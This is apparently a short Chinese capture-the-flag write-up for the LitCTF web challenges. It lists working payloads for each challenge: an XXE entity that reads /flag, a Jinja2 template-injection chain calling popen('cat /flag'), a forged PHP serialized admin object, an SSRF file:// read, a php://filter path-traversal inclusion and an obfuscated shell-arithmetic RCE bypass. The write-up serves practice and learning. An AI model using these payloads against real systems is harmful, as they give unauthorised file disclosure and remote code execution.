Litctf-web

Litctf-web

exx

xxe,

html 复制代码
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个...池子

ssti,没有过滤

复制代码
{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System

反序列化

php 复制代码
<?php

class User {

    public $username="admin";

    public $password="secure_password";

}
$a=new User();
echo base64_encode(serialize($a));

?>
复制代码
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?

ssrf

复制代码
file:///flag
高亮主题(划掉)背景查看器

文件包含伪协议

复制代码
POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

百万美元的诱惑

rce

/下

复制代码
?a[]=1&b[]=2&c=2025a

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

复制代码
%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
相关推荐
红糖奶茶3 分钟前
设备管理器中Android出现黄色感叹号怎么办? 如何修复?
android
前端炒粉5 分钟前
马克思主义基本原理在Vue框架中的指导作用探析
前端·javascript·vue.js
取个名字太难了~8 分钟前
从通用到专用:影像 SDK 的场景化封装与垂直行业落地实践
android·数码相机·美颜·相机连接·demu
zakariyaa339 分钟前
Android 绘制调度机制
android·gitee
EntyIU10 分钟前
CentOS-高可用部署手册-MySQL双主RedisNginx
linux·mysql·centos
安卓修改大师15 分钟前
安卓修改大师Smali语法实战:从零掌握数据类型、判断循环、自定义方法与Toast插桩
android
happyprince18 分钟前
12-vLLM 量化方案全面分析
前端·javascript·vllm
大圣编程20 分钟前
python break语句
开发语言·前端·python
vortex521 分钟前
Shell 位置参数传递:从入门到“怀疑人生“
linux·bash·shell
私人珍藏库37 分钟前
[Android] 多开空间-一机多账号+应用一键克隆双开
android·人工智能·智能手机·软件